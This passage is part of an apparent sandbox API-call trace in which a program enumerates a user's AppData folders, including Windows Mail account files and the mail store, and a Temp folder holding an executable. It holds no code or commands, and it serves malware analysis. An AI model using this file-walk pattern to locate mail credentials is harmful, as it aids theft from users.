lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79ae8cf0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ae8cf0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf657b4d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x2a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", cAlternateFileName="ACCOUN~2.OEA")) returned 1 [0221.685] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79ae8cf0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ae8cf0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf67b6975, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x6c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", cAlternateFileName="ACCOUN~1.OEA")) returned 1 [0221.686] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796be670, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf303882f, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Backup", cAlternateFileName="")) returned 1 [0221.686] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79ac2b90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ac2b90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7d53a7f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="edb.chk", cAlternateFileName="")) returned 1 [0221.686] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79a9ca30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79a9ca30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7d53a7f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0x0, dwReserved1=0x0, cFileName="edb.log", cAlternateFileName="")) returned 1 [0221.686] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79a768d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79a768d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2b29966, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0x0, dwReserved1=0x0, cFileName="edb00001.log", cAlternateFileName="")) returned 1 [0221.686] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79a50770, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79a50770, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2027392, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0x0, dwReserved1=0x0, cFileName="edbres00001.jrs", cAlternateFileName="EDBRES~2.JRS")) returned 1 [0221.686] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79a50770, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79a50770, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2216575, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0x0, dwReserved1=0x0, cFileName="edbres00002.jrs", cAlternateFileName="EDBRES~1.JRS")) returned 1 [0221.686] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79a50770, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79a50770, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf67dcad6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x104, dwReserved0=0x0, dwReserved1=0x0, cFileName="oeold.xml", cAlternateFileName="")) returned 1 [0221.686] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ba73d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf690d5d8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0221.686] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79a044b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79a044b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7d53a7f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x204000, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsMail.MSMessageStore", cAlternateFileName="WINDOW~1.MSM")) returned 1 [0221.686] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79a044b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79a044b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2e234eb, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsMail.pat", cAlternateFileName="WINDOW~1.PAT")) returned 1 [0221.686] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0221.686] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.688] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Media", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Media", lpFilePart=0x0) returned 0x38 [0221.688] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.688] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Media", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Media", lpFilePart=0x0) returned 0x38 [0221.688] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Media\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf7de167e, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.689] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf7de167e, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.689] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79a044b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf928f5c4, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="12.0", cAlternateFileName="")) returned 1 [0221.689] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79a044b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf928f5c4, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="12.0", cAlternateFileName="")) returned 0 [0221.689] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.689] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.689] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.689] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Sidebar", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Sidebar", lpFilePart=0x0) returned 0x3a [0221.689] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.689] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Sidebar", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Sidebar", lpFilePart=0x0) returned 0x3a [0221.690] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x184eadb, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.691] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x184eadb, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.691] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x184eadb, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Gadgets", cAlternateFileName="")) returned 1 [0221.691] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x184eadb, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x54, dwReserved0=0x0, dwReserved1=0x0, cFileName="Settings.ini", cAlternateFileName="")) returned 1 [0221.691] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0221.691] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.691] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.691] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.691] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", nBufferLength=0x105, lpBuffer=0x36ecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", lpFilePart=0x0) returned 0x25 [0221.691] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a4) returned 1 [0221.691] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", nBufferLength=0x105, lpBuffer=0x36ec84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", lpFilePart=0x0) returned 0x25 [0221.692] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\*", lpFindFileData=0x36ef54 | out: lpFindFileData=0x36ef54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x8970b3f0, ftLastAccessTime.dwHighDateTime=0x1d7fb6e, ftLastWriteTime.dwLowDateTime=0x8970b3f0, ftLastWriteTime.dwHighDateTime=0x1d7fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.692] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x8970b3f0, ftLastAccessTime.dwHighDateTime=0x1d7fb6e, ftLastWriteTime.dwLowDateTime=0x8970b3f0, ftLastWriteTime.dwHighDateTime=0x1d7fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.692] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf69b5080, ftCreationTime.dwHighDateTime=0x1d7d994, ftLastAccessTime.dwLowDateTime=0x8ef35a90, ftLastAccessTime.dwHighDateTime=0x1d7e60f, ftLastWriteTime.dwLowDateTime=0x8ef35a90, ftLastWriteTime.dwHighDateTime=0x1d7e60f, nFileSizeHigh=0x0, nFileSizeLow=0xb25, dwReserved0=0x0, dwReserved1=0x0, cFileName="1cjgRvoiEw6P5.jpg", cAlternateFileName="1CJGRV~1.JPG")) returned 1 [0221.692] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x73e50720, ftCreationTime.dwHighDateTime=0x1d7dd5f, ftLastAccessTime.dwLowDateTime=0xefbefa0, ftLastAccessTime.dwHighDateTime=0x1d7e001, ftLastWriteTime.dwLowDateTime=0xefbefa0, ftLastWriteTime.dwHighDateTime=0x1d7e001, nFileSizeHigh=0x0, nFileSizeLow=0xfcd9, dwReserved0=0x0, dwReserved1=0x0, cFileName="2Ct3K- 1PWvP1.avi", cAlternateFileName="2CT3K-~1.AVI")) returned 1 [0221.692] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6f55dfa0, ftCreationTime.dwHighDateTime=0x1d7e542, ftLastAccessTime.dwLowDateTime=0x25b39530, ftLastAccessTime.dwHighDateTime=0x1d7e566, ftLastWriteTime.dwLowDateTime=0x25b39530, ftLastWriteTime.dwHighDateTime=0x1d7e566, nFileSizeHigh=0x0, nFileSizeLow=0x139f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="5_RT-JgEKQtcm.bmp", cAlternateFileName="5_RT-J~1.BMP")) returned 1 [0221.692] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8970b3f0, ftCreationTime.dwHighDateTime=0x1d7fb6e, ftLastAccessTime.dwLowDateTime=0x8970b3f0, ftLastAccessTime.dwHighDateTime=0x1d7fb6e, ftLastWriteTime.dwLowDateTime=0x898ae310, ftLastWriteTime.dwHighDateTime=0x1d7fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x374e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="663A.exe", cAlternateFileName="")) returned 1 [0221.692] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7995d960, ftCreationTime.dwHighDateTime=0x1d7df8f, ftLastAccessTime.dwLowDateTime=0xe6a5cf60, ftLastAccessTime.dwHighDateTime=0x1d7e403, ftLastWriteTime.dwLowDateTime=0xe6a5cf60, ftLastWriteTime.dwHighDateTime=0x1d7e403, nFileSizeHigh=0x0, nFileSizeLow=0x7c05, dwReserved0=0x0, dwReserved1=0x0, cFileName="7JmPPGJ8rPWeI2.ppt", cAlternateFileName="7JMPPG~1.PPT")) returned 1 [0221.692] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6f70bad0, ftCreationTime.dwHighDateTime=0x1d7dba3, ftLastAccessTime.dwLowDateTime=0x1b966300, ftLastAccessTime.dwHighDateTime=0x1d7dda2, ftLastWriteTime.dwLowDateTime=0x1b966300, ftLastWriteTime.dwHighDateTime=0x1d7dda2, nFileSizeHigh=0x0, nFileSizeLow=0x19da, dwReserved0=0x0, dwReserved1=0x0, cFileName="9OABWGhlJcE.png", cAlternateFileName="9OABWG~1.PNG")) returned 1 [0221.692] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x136a7180, ftCreationTime.dwHighDateTime=0x1d7db18, ftLastAccessTime.dwLowDateTime=0x8ffda840, ftLastAccessTime.dwHighDateTime=0x1d7e075, ftLastWriteTime.dwLowDateTime=0x8ffda840, ftLastWriteTime.dwHighDateTime=0x1d7e075, nFileSizeHigh=0x0, nFileSizeLow=0xce76, dwReserved0=0x0, dwReserved1=0x0, cFileName="ApXXdasLzpaI.jpg", cAlternateFileName="APXXDA~1.JPG")) returned 1 [0221.692] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa51ac520, ftCreationTime.dwHighDateTime=0x1d7e14f, ftLastAccessTime.dwLowDateTime=0x3bbae2a0, ftLastAccessTime.dwHighDateTime=0x1d7e3dd, ftLastWriteTime.dwLowDateTime=0x3bbae2a0, ftLastWriteTime.dwHighDateTime=0x1d7e3dd, nFileSizeHigh=0x0, nFileSizeLow=0x6c72, dwReserved0=0x0, dwReserved1=0x0, cFileName="bdpabOSJfvOVhwLK.mp4", cAlternateFileName="BDPABO~1.MP4")) returned 1 [0221.693] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x702772e0, ftCreationTime.dwHighDateTime=0x1d7dcaf, ftLastAccessTime.dwLowDateTime=0xc7d214c0, ftLastAccessTime.dwHighDateTime=0x1d7e1d0, ftLastWriteTime.dwLowDateTime=0xc7d214c0, ftLastWriteTime.dwHighDateTime=0x1d7e1d0, nFileSizeHigh=0x0, nFileSizeLow=0x556a, dwReserved0=0x0, dwReserved1=0x0, cFileName="BZl_rK04.ots", cAlternateFileName="")) returned 1 [0221.693] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa5a67980, ftCreationTime.dwHighDateTime=0x1d7de11, ftLastAccessTime.dwLowDateTime=0x42966b30, ftLastAccessTime.dwHighDateTime=0x1d7e76b, ftLastWriteTime.dwLowDateTime=0x42966b30, ftLastWriteTime.dwHighDateTime=0x1d7e76b, nFileSizeHigh=0x0, nFileSizeLow=0x4984, dwReserved0=0x0, dwReserved1=0x0, cFileName="c9u93Dn0bb.xlsx", cAlternateFileName="C9U93D~1.XLS")) returned 1 [0221.693] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70e4840, ftCreationTime.dwHighDateTime=0x1d7df3b, ftLastAccessTime.dwLowDateTime=0xd95d4610, ftLastAccessTime.dwHighDateTime=0x1d7e680, ftLastWriteTime.dwLowDateTime=0xd95d4610, ftLastWriteTime.dwHighDateTime=0x1d7e680, nFileSizeHigh=0x0, nFileSizeLow=0x6335, dwReserved0=0x0, dwReserved1=0x0, cFileName="CZw3Jd.swf", cAlternateFileName="")) returned 1 [0221.693] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabb5ce90, ftCreationTime.dwHighDateTime=0x1d7e085, ftLastAccessTime.dwLowDateTime=0x6f6ea190, ftLastAccessTime.dwHighDateTime=0x1d7e23e, ftLastWriteTime.dwLowDateTime=0x6f6ea190, ftLastWriteTime.dwHighDateTime=0x1d7e23e, nFileSizeHigh=0x0, nFileSizeLow=0xd8a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="FJjVXXxADPn56.mp3", cAlternateFileName="FJJVXX~1.MP3")) returned 1 [0221.693] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x852aa500, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x852aa500, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FXSAPIDebugLogFile.txt", cAlternateFileName="FXSAPI~1.TXT")) returned 1 [0221.693] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdb0e12d0, ftCreationTime.dwHighDateTime=0x1d7dd4a, ftLastAccessTime.dwLowDateTime=0xeeea4690, ftLastAccessTime.dwHighDateTime=0x1d7df69, ftLastWriteTime.dwLowDateTime=0xeeea4690, ftLastWriteTime.dwHighDateTime=0x1d7df69, nFileSizeHigh=0x0, nFileSizeLow=0x1686d, dwReserved0=0x0, dwReserved1=0x0, cFileName="gAsVIEtfMcgKxyY_.jpg", cAlternateFileName="GASVIE~1.JPG")) returned 1 [0221.693] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc9548030, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xc9548030, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xc9548030, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="gen_py", cAlternateFileName="")) returned 1 [0221.693] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2cc40ec0, ftCreationTime.dwHighDateTime=0x1d7e2c5, ftLastAccessTime.dwLowDateTime=0x75ce81d0, ftLastAccessTime.dwHighDateTime=0x1d7e519, ftLastWriteTime.dwLowDateTime=0x75ce81d0, ftLastWriteTime.dwHighDateTime=0x1d7e519, nFileSizeHigh=0x0, nFileSizeLow=0x1489c, dwReserved0=0x0, dwReserved1=0x0, cFileName="GHt0.bmp", cAlternateFileName="")) returned 1 [0221.693] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2195d0b0, ftCreationTime.dwHighDateTime=0x1d7e644, ftLastAccessTime.dwLowDateTime=0x54573140, ftLastAccessTime.dwHighDateTime=0x1d7e6d2, ftLastWriteTime.dwLowDateTime=0x54573140, ftLastWriteTime.dwHighDateTime=0x1d7e6d2, nFileSizeHigh=0x0, nFileSizeLow=0x83c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="HFvUrds.xlsx", cAlternateFileName="HFVURD~1.XLS")) returned 1 [0221.693] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb5ab2a0, ftCreationTime.dwHighDateTime=0x1d7d822, ftLastAccessTime.dwLowDateTime=0x777c85b0, ftLastAccessTime.dwHighDateTime=0x1d7de23, ftLastWriteTime.dwLowDateTime=0x777c85b0, ftLastWriteTime.dwHighDateTime=0x1d7de23, nFileSizeHigh=0x0, 